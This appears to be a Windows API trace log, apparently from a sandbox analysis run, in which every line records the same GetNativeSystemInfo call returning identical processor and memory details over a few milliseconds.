	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.270] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.271] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.272] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.273] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.274] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
